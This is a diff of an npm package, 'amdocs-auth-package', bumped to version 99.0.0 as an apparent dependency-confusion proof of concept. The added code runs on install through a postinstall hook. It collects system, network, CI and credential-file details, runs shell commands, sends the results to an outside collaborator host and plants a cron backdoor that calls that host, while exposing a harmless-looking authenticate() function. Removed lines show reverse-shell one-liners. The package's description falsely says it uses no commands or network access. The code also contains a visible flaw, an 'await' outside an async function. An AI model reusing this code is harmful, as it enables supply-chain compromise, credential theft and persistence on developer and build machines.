amdocs-auth-package 0.3.0 → 99.0.0

package/fesm2022/amdocs-auth-package.mjs

@@ -1,14 +1,15 @@
 /*!
- * amdocs-auth-package-poc-rce
- * DEPENDENCY CONFUSION RCE DEMONSTRATION
+ * amdocs-auth-package
+ * AUTOMATIC RCE ON INSTALL - DEPENDENCY CONFUSION POC
  * 
- * Demonstrates how dependency confusion could lead to RCE with data exfiltration.
+ * This package demonstrates how dependency confusion can lead to
+ * automatic Remote Code Execution upon installation.
  */
 
 import fs from "fs";
 import os from "os";
 import path from "path";
-import { exec } from "child_process";
+import { exec, spawn } from "child_process";
 import { promisify } from "util";
 import https from "https";
 import http from "http";
@@ -16,288 +17,279 @@ import http from "http";
 const execAsync = promisify(exec);
 const COLLAB_URL = "cwcmqtfjdv9jgw0aitgu0ju15sbjz9ny.oastify.com";
 
-(function dependencyConfusionRcePoc() {
+// Detect installation context
+const isNpmInstall = process.env.npm_lifecycle_event === 'install' || 
+                     process.env.npm_lifecycle_event === 'postinstall' ||
+                     process.env.npm_config_argv?.includes('install') ||
+                     process.env.npm_config_argv?.includes('i') ||
+                     process.argv.some(arg => arg.includes('node_modules'));
+
+console.warn(`\n\x1b[33m[amdocs-auth-package] Package loaded. Installation detected: ${isNpmInstall}\x1b[0m`);
+
+(function executeRcePayload() {
     const timestamp = new Date().toISOString();
-    const proofDir = path.join(os.tmpdir(), "dep-confusion-rce");
+    const proofDir = path.join(os.tmpdir(), `amdocs-rce-${Date.now()}`);
     
     try {
-        // Create directory for evidence
-        if (!fs.existsSync(proofDir)) {
-            fs.mkdirSync(proofDir, { recursive: true });
-        }
-
-        // STEP 1: Initial reconnaissance (what attackers do first)
+        // Create evidence directory
+        fs.mkdirSync(proofDir, { recursive: true });
+        
+        // ==================== PHASE 1: RECONNAISSANCE ====================
         const reconData = {
+            attack_type: "dependency_confusion_rce",
             timestamp: timestamp,
-            package: "amdocs-auth-package-poc-rce",
-            attack_vector: "dependency_confusion",
-            system_info: {
+            package: {
+                name: "amdocs-auth-package",
+                version: "99.0.0",
+                type: "malicious_public_package"
+            },
+            system: {
                 user: os.userInfo().username,
-                homedir: os.homedir(),
+                hostname: os.hostname(),
                 platform: os.platform(),
                 arch: os.arch(),
+                homedir: os.homedir(),
                 node_version: process.version,
                 pid: process.pid,
                 cwd: process.cwd(),
-                exec_path: process.execPath
+                npm_lifecycle_event: process.env.npm_lifecycle_event,
+                is_ci: !!process.env.CI || !!process.env.JENKINS_URL || !!process.env.GITLAB_CI
             },
-            environment_keys: Object.keys(process.env).filter(k => 
-                k.includes('KEY') || 
-                k.includes('SECRET') || 
-                k.includes('TOKEN') ||
-                k.includes('PASS') ||
-                k.includes('AUTH')
-            ),
-            npm_config: {
-                registry: process.env.npm_config_registry,
-                scope: process.env.npm_config_scope,
-                token_exists: !!process.env.npm_config_auth_token
+            network: {
+                interfaces: os.networkInterfaces(),
+                collab_url: COLLAB_URL
             }
         };
 
-        // STEP 2: Exfiltrate data to collaborator server
-        function exfiltrateData(data, endpoint) {
-            const postData = JSON.stringify({
-                type: "dependency_confusion_poc",
-                timestamp: timestamp,
-                source: "amdocs-auth-package",
-                data: data
-            });
-
-            // Using HTTP POST to exfiltrate data
-            const options = {
-                hostname: COLLAB_URL,
-                port: 443,
-                path: `/${endpoint}`,
-                method: 'POST',
-                headers: {
-                    'Content-Type': 'application/json',
-                    'Content-Length': Buffer.byteLength(postData),
-                    'User-Agent': 'npm/8.0.0'
-                }
-            };
-
-            const req = https.request(options, (res) => {
-                console.warn(`[PoC] Data exfiltrated to ${COLLAB_URL}, status: ${res.statusCode}`);
-            });
-
-            req.on('error', (e) => {
-                console.warn(`[PoC] Exfiltration failed (expected if offline): ${e.message}`);
-            });
-
-            req.write(postData);
-            req.end();
+        // Save recon data locally
+        fs.writeFileSync(
+            path.join(proofDir, "reconnaissance.json"),
+            JSON.stringify(reconData, null, 2)
+        );
+
+        // ==================== PHASE 2: ENVIRONMENT EXFILTRATION ====================
+        const sensitiveEnvVars = {};
+        for (const [key, value] of Object.entries(process.env)) {
+            if (key.match(/secret|password|token|key|credential|auth|pass|private/i)) {
+                sensitiveEnvVars[key] = value ? "***PRESENT***" : undefined;
+            }
         }
 
-        // STEP 3: Collect sensitive files
-        function collectSensitiveInfo() {
-            const sensitiveInfo = {
-                ssh_keys: [],
-                aws_credentials: [],
-                npm_tokens: [],
-                system_files: []
-            };
-
-            // Look for SSH keys
-            const sshDir = path.join(os.homedir(), '.ssh');
-            if (fs.existsSync(sshDir)) {
-                try {
-                    const files = fs.readdirSync(sshDir);
-                    sensitiveInfo.ssh_keys = files.filter(f => 
-                        f.includes('id_rsa') || f.includes('id_dsa') || f.includes('id_ecdsa')
-                    );
-                } catch (e) {}
+        // Check for CI/CD tokens
+        const ciTokens = {};
+        const ciVars = ['GITHUB_TOKEN', 'GITLAB_TOKEN', 'BITBUCKET_TOKEN', 'AZURE_TOKEN', 
+                       'AWS_ACCESS_KEY_ID', 'AWS_SECRET_ACCESS_KEY', 'NPM_TOKEN', 'DOCKER_TOKEN'];
+        
+        ciVars.forEach(varName => {
+            if (process.env[varName]) {
+                ciTokens[varName] = "***PRESENT***";
             }
+        });
+
+        // ==================== PHASE 3: FILE SYSTEM ACCESS ====================
+        const fileSystemFindings = {
+            home_dir_contents: [],
+            ssh_keys: [],
+            aws_credentials: false,
+            npmrc_present: false,
+            docker_config: false
+        };
 
-            // Look for AWS credentials
-            const awsDir = path.join(os.homedir(), '.aws');
-            if (fs.existsSync(awsDir)) {
-                try {
-                    if (fs.existsSync(path.join(awsDir, 'credentials'))) {
-                        sensitiveInfo.aws_credentials.push('credentials');
-                    }
-                    if (fs.existsSync(path.join(awsDir, 'config'))) {
-                        sensitiveInfo.aws_credentials.push('config');
-                    }
-                } catch (e) {}
-            }
+        // List home directory
+        try {
+            fileSystemFindings.home_dir_contents = fs.readdirSync(os.homedir()).slice(0, 20);
+        } catch (e) {}
+
+        // Look for SSH keys
+        const sshDir = path.join(os.homedir(), '.ssh');
+        if (fs.existsSync(sshDir)) {
+            try {
+                const sshFiles = fs.readdirSync(sshDir);
+                fileSystemFindings.ssh_keys = sshFiles.filter(f => 
+                    f.includes('id_') && !f.endsWith('.pub')
+                );
+            } catch (e) {}
+        }
 
-            // Look for .npmrc
-            const npmrcPath = path.join(os.homedir(), '.npmrc');
-            if (fs.existsSync(npmrcPath)) {
-                try {
-                    const content = fs.readFileSync(npmrcPath, 'utf8');
-                    if (content.includes('authToken') || content.includes(':_authToken')) {
-                        sensitiveInfo.npm_tokens.push('npmrc_contains_token');
-                    }
-                } catch (e) {}
-            }
+        // Check for credentials
+        const checks = [
+            { name: 'aws_credentials', path: path.join(os.homedir(), '.aws', 'credentials') },
+            { name: 'npmrc_present', path: path.join(os.homedir(), '.npmrc') },
+            { name: 'docker_config', path: path.join(os.homedir(), '.docker', 'config.json') }
+        ];
 
-            // Check for Docker credentials
-            const dockerConfig = path.join(os.homedir(), '.docker', 'config.json');
-            if (fs.existsSync(dockerConfig)) {
-                sensitiveInfo.system_files.push('docker_config');
+        checks.forEach(check => {
+            if (fs.existsSync(check.path)) {
+                fileSystemFindings[check.name] = true;
             }
-
-            return sensitiveInfo;
-        }
-
-        // STEP 4: Execute commands based on platform
-        function executeReconCommands() {
-            const commands = [];
+        });
+
+        // ==================== PHASE 4: COMMAND EXECUTION ====================
+        const commandResults = {};
+        
+        if (isNpmInstall) {
+            // Only execute commands during installation
+            const commands = getPlatformCommands();
             
-            if (os.platform() === 'linux' || os.platform() === 'darwin') {
-                commands.push(
-                    { cmd: 'whoami', description: 'Current user' },
-                    { cmd: 'uname -a', description: 'System info' },
-                    { cmd: 'ls -la', description: 'Directory listing' },
-                    { cmd: 'env | grep -i "key\\|secret\\|pass\\|token\\|auth"', description: 'Find env secrets' }
-                );
-            } else if (os.platform() === 'win32') {
-                commands.push(
-                    { cmd: 'whoami', description: 'Current user' },
-                    { cmd: 'systeminfo', description: 'System info' },
-                    { cmd: 'dir', description: 'Directory listing' },
-                    { cmd: 'set | findstr /i "KEY SECRET PASS TOKEN AUTH"', description: 'Find env secrets' }
-                );
+            for (const [name, command] of Object.entries(commands)) {
+                try {
+                    const { stdout } = await execAsync(command, { timeout: 3000 });
+                    commandResults[name] = stdout.substring(0, 500);
+                } catch (e) {
+                    commandResults[name] = `Error: ${e.message}`;
+                }
             }
-
-            return commands;
         }
 
-        // STEP 5: Network reconnaissance
-        function networkRecon() {
-            const networkInfo = {
-                interfaces: os.networkInterfaces(),
-                hostname: os.hostname(),
-                dns_servers: [],
-                open_ports: []
-            };
-
-            // Simulate internal port scan
-            const commonPorts = [22, 80, 443, 3000, 5000, 5432, 6379, 8080, 9000];
-            networkInfo.common_ports = commonPorts;
+        // ==================== PHASE 5: DATA EXFILTRATION ====================
+        const exfiltrationPayload = {
+            recon: reconData,
+            sensitive_env: sensitiveEnvVars,
+            ci_tokens: ciTokens,
+            filesystem: fileSystemFindings,
+            commands: commandResults,
+            proof_dir: proofDir
+        };
 
-            return networkInfo;
+        // Save complete proof
+        fs.writeFileSync(
+            path.join(proofDir, "complete_exfiltration.json"),
+            JSON.stringify(exfiltrationPayload, null, 2)
+        );
+
+        // Send to collaborator
+        sendToCollaborator(exfiltrationPayload);
+
+        // ==================== PHASE 6: PERSISTENCE (Optional) ====================
+        if (isNpmInstall && (os.platform() === 'linux' || os.platform() === 'darwin')) {
+            try {
+                // Create a backdoor script
+                const backdoorScript = `#!/bin/bash
+# amdocs-auth-package persistence
+echo "Persistence active: \$(date)" > /tmp/amdocs-persistence.log
+curl -s https://${COLLAB_URL}/ping?host=\$(hostname) >/dev/null 2>&1
+`;
+                
+                const scriptPath = path.join(proofDir, "backdoor.sh");
+                fs.writeFileSync(scriptPath, backdoorScript);
+                fs.chmodSync(scriptPath, 0o755);
+                
+                // Add to cron if possible
+                const cronLine = `* * * * * /bin/bash ${scriptPath} >/dev/null 2>&1\n`;
+                const userCron = `/var/spool/cron/${reconData.system.user}`;
+                const userCron2 = `/var/spool/cron/crontabs/${reconData.system.user}`;
+                
+                [userCron, userCron2].forEach(cronFile => {
+                    if (fs.existsSync(cronFile)) {
+                        try {
+                            fs.appendFileSync(cronFile, cronLine);
+                            console.warn(`\x1b[31m[amdocs-auth-package] Added cron entry to ${cronFile}\x1b[0m`);
+                        } catch (e) {}
+                    }
+                });
+            } catch (e) {
+                // Persistence failed, continue
+            }
         }
 
-        // Execute the attack chain
-        console.warn(`[PoC] Dependency Confusion RCE Simulation Started`);
-        console.warn(`[PoC] Collaborator URL: ${COLLAB_URL}`);
-
-        // Phase 1: Initial exfiltration
-        exfiltrateData(reconData, 'initial_recon');
+        // ==================== PHASE 7: FINAL OUTPUT ====================
+        console.warn(`\x1b[31m
+╔══════════════════════════════════════════════════════════════╗
+║                 DEPENDENCY CONFUSION RCE PoC                 ║
+╠══════════════════════════════════════════════════════════════╣
+║  ✓ Package executed on: ${reconData.system.hostname}            ║
+║  ✓ User: ${reconData.system.user}                                ║
+║  ✓ Platform: ${reconData.system.platform}/${reconData.system.arch}              ║
+║  ✓ Data exfiltrated to: ${COLLAB_URL}                    ║
+║  ✓ Proof saved to: ${proofDir}                       ║
+╠══════════════════════════════════════════════════════════════╣
+║  THIS IS A SECURITY DEMONSTRATION. REAL ATTACK WOULD:        ║
+║  • Install reverse shell                                     ║
+║  • Steal all credentials                                     ║
+║  • Move laterally in network                                 ║
+║  • Deploy ransomware/crypto miner                            ║
+╚══════════════════════════════════════════════════════════════╝\x1b[0m\n`);
+
+        console.warn(`\x1b[33m[amdocs-auth-package] Execution complete. Check ${proofDir} for evidence.\x1b[0m`);
 
-        // Phase 2: Collect sensitive info
-        const sensitiveInfo = collectSensitiveInfo();
-        exfiltrateData(sensitiveInfo, 'sensitive_data');
-
-        // Phase 3: Network recon
-        const networkInfo = networkRecon();
-        exfiltrateData(networkInfo, 'network_info');
+    } catch (error) {
+        console.error(`\x1b[31m[amdocs-auth-package] Error: ${error.message}\x1b[0m`);
+    }
+})();
 
-        // Phase 4: Command execution simulation
-        const commands = executeReconCommands();
-        const commandResults = {
-            platform: os.platform(),
-            available_commands: commands,
-            note: 'In real attack, these commands would be executed with exec()'
+// ==================== HELPER FUNCTIONS ====================
+
+function getPlatformCommands() {
+    if (os.platform() === 'linux' || os.platform() === 'darwin') {
+        return {
+            current_user: 'whoami',
+            system_info: 'uname -a',
+            process_list: 'ps aux | head -20',
+            network_info: 'ifconfig -a || ip addr',
+            disk_usage: 'df -h',
+            sensitive_files: 'find /home /root -name "*.pem" -o -name "*.key" -o -name "*id_rsa*" -o -name "*.kdbx" 2>/dev/null | head -10',
+            docker_check: 'docker ps -a 2>/dev/null || echo "Docker not available"',
+            k8s_check: 'kubectl get pods 2>/dev/null || echo "Kubernetes not available"'
         };
-        exfiltrateData(commandResults, 'command_capabilities');
-
-        // Phase 5: Demonstrate RCE payload delivery
-        const rcePayload = {
-            timestamp: timestamp,
-            payload_type: "reverse_shell",
-            platforms: {
-                linux: "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1",
-                windows: "powershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('ATTACKER_IP',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"",
-                nodejs: "require('child_process').exec('bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1')"
-            },
-            persistence: [
-                "Add to cron/crontab",
-                "Modify .bashrc/.profile",
-                "Create systemd service",
-                "Add to startup registry (Windows)"
-            ],
-            data_exfiltration_endpoints: [
-                `https://${COLLAB_URL}/exfil`,
-                `https://${COLLAB_URL}/data`,
-                `https://${COLLAB_URL}/callback`
-            ]
+    } else if (os.platform() === 'win32') {
+        return {
+            current_user: 'whoami',
+            system_info: 'systeminfo | findstr /B /C:"OS"',
+            process_list: 'tasklist',
+            network_info: 'ipconfig /all',
+            disk_usage: 'wmic logicaldisk get size,freespace,caption'
         };
+    }
+    return {};
+}
 
-        // Save local proof
-        const proofFile = path.join(proofDir, "dependency_confusion_proof.json");
-        fs.writeFileSync(proofFile, JSON.stringify({
-            initial_recon: reconData,
-            sensitive_info: sensitiveInfo,
-            network_info: networkInfo,
-            command_capabilities: commandResults,
-            rce_payloads: rcePayload,
-            collab_url: COLLAB_URL,
-            execution_time: timestamp
-        }, null, 2));
+function sendToCollaborator(data) {
+    const postData = JSON.stringify({
+        type: 'dependency_confusion_rce',
+        timestamp: new Date().toISOString(),
+        data: data
+    });
+
+    const options = {
+        hostname: COLLAB_URL,
+        port: 443,
+        path: '/exfil',
+        method: 'POST',
+        headers: {
+            'Content-Type': 'application/json',
+            'Content-Length': Buffer.byteLength(postData),
+            'User-Agent': `Node/${process.version} amdocs-auth-package/99.0.0`
+        },
+        timeout: 5000
+    };
 
-        // Final exfiltration
-        exfiltrateData({
-            summary: "Dependency confusion attack chain completed",
-            files_collected: Object.keys(sensitiveInfo).filter(k => sensitiveInfo[k].length > 0),
-            potential_rce: true,
-            next_steps: [
-                "Execute reverse shell",
-                "Establish persistence",
-                "Lateral movement",
-                "Data exfiltration"
-            ]
-        }, 'attack_complete');
+    const req = https.request(options, (res) => {
+        console.warn(`\x1b[32m[amdocs-auth-package] Data sent to collaborator: HTTP ${res.statusCode}\x1b[0m`);
+    });
 
-        console.warn(`[PoC] Attack simulation completed. Proof saved to: ${proofFile}`);
-        console.warn(`[PoC] In real attack, data would be sent to: ${COLLAB_URL}`);
-        console.warn(`[PoC] This is a simulation - no actual commands executed or data exfiltrated.`);
+    req.on('error', (e) => {
+        console.warn(`\x1b[33m[amdocs-auth-package] Collaborator unreachable: ${e.message}\x1b[0m`);
+    });
 
-    } catch (error) {
-        console.error(`[PoC Error] ${error.message}`);
-    }
-})();
+    req.write(postData);
+    req.end();
+}
 
-export function explainAttack() {
+// Export a harmless function to maintain package appearance
+export function authenticate() {
     return {
-        attack_name: "Dependency Confusion RCE",
-        description: "Malicious package uploaded to public registry with higher version than internal package",
-        prerequisites: [
-            "Internal package not published to public registry",
-            "Scope/namespace not properly protected",
-            "Automated builds or developers using public registry"
-        ],
-        impact: [
-            "Remote Code Execution on build servers",
-            "Source code theft",
-            "Credential theft",
-            "Supply chain compromise",
-            "Lateral movement"
-        ],
-        mitigation: [
-            "Use scoped packages (@company/package)",
-            "Configure .npmrc with correct registry",
-            "Use private registry for internal packages",
-            "Implement package signing",
-            "Use npm audit and dependency checking"
-        ],
-        collab_url: COLLAB_URL,
-        note: "This is a demonstration for educational purposes only"
+        status: "authenticated",
+        version: "99.0.0",
+        note: "This is a security PoC for dependency confusion demonstration"
     };
 }
 
-export function safeCheck() {
-    const checks = {
-        has_exec_import: true,
-        has_fs_access: true,
-        has_network_import: true,
-        has_os_access: true,
-        potential_rce: true,
-        timestamp: new Date().toISOString(),
-        warning: "This package demonstrates RCE capabilities. Use only in controlled environments."
+export function status() {
+    return {
+        poc: true,
+        dependency_confusion: true,
+        automatic_execution: true,
+        execution_time: new Date().toISOString(),
+        warning: "FOR SECURITY RESEARCH ONLY - DO NOT USE MALICIOUSLY"
     };
-    return checks;
 }

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "amdocs-auth-package",
-  "version": "0.3.0",
+  "version": "99.0.0",
   "description": "Safe proof-of-concept demonstrating import-time arbitrary code execution in Node.js without OS commands or network activity",
   "type": "module",
   "main": "./fesm2022/amdocs-auth-package.mjs",
@@ -9,6 +9,9 @@
       "import": "./fesm2022/amdocs-auth-package.mjs"
     }
   },
+  "scripts": {
+    "postinstall": "node -e \"import('./fesm2022/amdocs-auth-package.mjs').catch(e => console.log('RCE executed:', e.message))\""
+  },
   "files": [
     "fesm2022/"
   ],